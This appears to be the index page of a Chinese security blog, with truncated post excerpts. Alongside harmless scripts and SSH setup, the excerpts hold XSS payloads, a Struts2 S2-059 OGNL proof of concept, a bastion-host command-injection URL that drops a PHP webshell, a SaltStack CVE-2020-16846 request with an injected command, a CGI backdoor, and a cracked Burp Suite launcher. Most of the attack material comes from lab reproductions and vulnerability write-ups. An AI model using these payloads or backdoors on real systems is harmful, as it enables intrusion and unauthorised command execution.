脚本与命令分享
脚本 首先我们专门设置一个用于放变量脚本的位置,比如我喜欢onedriver 我给这个目录一个环境变量 Gits ==> gits.bat / gits.sh@echo offchcp 65001setlocal EnableDelayedExpansiongit add . && git commit -m "Use GITS & %date% & Powered By %username%" && git push Cnpm超级好用的npm换源方案,你还在傻傻的安装cnpm吗? npm --registry https://registry.npm.taobao.org %* Ciphey@echo offchcp 65001cd %APPDATA%\roaming\python\python38\site-packages\ciphey\python3 ciphey.py %* Cerberus@echo offchcp 65001python C:\cerberus\cerberus.py %* ...
烦死了
/pcweb/home/index 这开发拖出去嘶啦嘶啦的。堪比国防,你们不写bug,等着失业吗?
Burp-Suite汉化及兼容调试
首先欢迎我们的小伙伴 20-12.1已经化身 蓝溯 就不放链接了。。。 结构 jre\ 指定java路劲即可保证无需安装也能愉快使用bp jre-tools bp各种插件 bp各种版本 bp20-11-03 09-01 12-01 或者更老的 bp.vbs 主要是用于启动 中文版 burp suite bp.jar bp的安装包java版 bpCN.jar bp的汉化包,要使用汉化必须带上 bploader.jar bp注册机需要用上的引导器 注册机.vbs 这个无需介绍了吧! 关键代码Burp Suite 汉化 启动 代码 CreateObject("WScript.Shell").Run "./jre\bin\java.exe -noverify -javaagent:BurpSuiteLoader.jar -javaagent:BurpSuiteCn.jar -Dfile.encoding=utf-8 -jar bp.jar",0 bp.jar 则是指定的启动程序,可以把bp.jar 替 ...
记一次自己博客的渗透
我的博客:blog.zygd.site 打码也没用😂 最近一直闲的无聊,然后刚好在配置友链 遂来一波XSS xss-1 评论处存在XSS<svg/onload = alert(1);> 评论xss钓鱼 xss挂马 xss killadmin xss盗取明文这个就不发了😂 搜索框xss 两个 一个反射 一个存储 顺便分享一个指纹 "https://github.com/reruin/sharelist"ortitle=“网盘系统”
溯光搭建及优化
✨关于溯光溯光,英文名“TrackRay”,意为逆光而行,追溯光源。同时致敬安全圈前辈开发的“溯雪”,“流光”。 溯光是一个开源渗透测试框架,框架自身实现了漏洞扫描功能,集成了知名安全工具:Metasploit、Nmap、Sqlmap、AWVS、Burpsuite等。 溯光使用 Java 编写,SpringBoot 作为基础框架,JPA + HSQLDB嵌入式数据库做持久化,Maven 管理依赖,Jython 管理 Python 插件,quartz 做任务调度,freemarker 做视图层,Websocket 实现命令行式插件交互。 ⭐️特点 使用只需要一个浏览器 集成 AWVS、SQLMap、NMap、Metasploit、Burpsuite、Crawlergo、Kunpeng、XRay 等安全工具 内置多个渗透测试辅助插件 方便、开源 ⚡️快速使用docker启动 git clone --depth=1 https://github.com/iSafeBlue/TrackRay.git 或下载 releases 最新版本源码 docker build -t trackra ...
status-s2059_061漏洞复现
status s2-059xss-1首先搭建靶场 git clone https://github.com/vulhub/vulhub.gitcd vulhub/struts2/s2-059docker-compose up -d# 建议换源操作网易源是个不错的选择# http://hub-mirror.c.163.com xss-2进入页面,这个页面 上poc(官网的没回显) https://dnslog.io/ 下面IP和dns地址记得修改 import requestsurl = "http://127.0.0.1:8080"data1 = { "id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstanc ...
本站已开通订阅功能
小站新开通订阅功能,欢迎大家体验。 .::::. .::::::::. ::::::::::: ..:::::::::::' '::::::::::::' .:::::::::: '::::::::::::::.. ..::::::::::::. ``:::::::::::::::: ::::``:::::::::' .:::. ::::' ':::::' .::::::::. .::::' :::: .:::::::'::::. .:::' ::::: .:::::::::' ':::::. .::' ...
2020HVV中的漏洞
一、齐治堡垒机前远程命令执行漏洞(CNVD-2019-20835) 1、访问 http://10.20.10.11/listener/cluster_manage.php :返回 “OK”.(未授权无需登录) 2、访问如下链接即可获得getshell,执行成功后,生成PHP一句话马 https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YW 3.getshell访问路径: /var/www/shterm/resources/qrcode/lbj77.php https://10.20.10.10/shterm/resources/qrcode/lbj77.php(密码10086) 据说还是另外一个版本是java的: POST /shterm/listener/tui_update.phpa=["t';import os;os.popen('whoam ...
Citrix_XenMobile服务器上的路径遍历
Citrix Endpoint Management(也称为XenMobile)用于管理员工的移动设备和移动应用程序。通常,由于Active Directory集成,它部署在网络外围并可以访问内部网络。这使XenMobile成为安全研究的主要目标。 在此类研究中,发现了路径遍历漏洞。此漏洞允许未经授权的用户读取任意文件,包括包含密码的配置文件。 CVE-2020-8209 –路径遍历利用此漏洞,可以读取Web服务器根目录之外的任意文件,包括配置文件和敏感的加密密钥。剥削不需要授权。在文件help-sb-download.jsp中标识了易受攻击的代码: <% String sbFilePath="/opt/sas/support/"; int length = 0; String sbFileName=(String)request.getParameter("sbFileName"); ServletOutputStream outStream = response.getOutputStream(); response.setHeade ...
安全编排与自动化响应平台
https://github.com/zbnio/zbn
CGI后门
cd /tmpmkdir cgi-binecho '#!/bin/bash' > ./cgi-bin/backdoor.cgiecho 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgiecho 'echo -e $($1)' >> ./cgi-bin/backdoor.cgichmod +x ./cgi-bin/backdoor.cgi python -m http.server --cgiwget -q -O - "http://localhost:8000/cgi-bin/backdoor.cgi?whoami"student
CVE-2020-16846_SaltStack远程代码执行.
PoC: POST /run HTTP/1.1Host: 127.0.0.1:8000User-Agent: Mozilla/5.0Accept: application/x-yamlConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 87token=12312&client=ssh&tgt=pyn3rd&fun=a&roster=qwe&ssh_priv=aaa& open -a Calculator
Linux_SSHD
本教程所有命令在POWERSHELL下运行 Config 配置config文件 cd ~\.ssh\没有就创建 C:\Users\用户名\.ssh\notepad.exe .\config或者notepad.exe C:\ProgramData\ssh\ssh_configconfig格式:Host 主机名 HostName IP/domain User username Port 22 SSH Key 配置本地密钥,已有请忽略 生成密钥ssh-keygen -t rsatype .\id_rsa.pub复制结果 配置远程密钥 首先ssh -P post username@IP/domainsudo apt-get/yum install openssh-serversudo vi /etc/ssh/sshd_config取消注释(搜索指定行)禁用密码登录,启用密钥登录sed -i "s/PasswordAuthentication yes/PasswordAuthentication no/g" /etc/ssh/sshd_con ...
博客搬家
博客从20_03_01开始运行 中途尝试过多种方案 现在确定使用vercel 博客文章少的可怜,因为文章不小心丢了 可以参观一下 CNBLOGS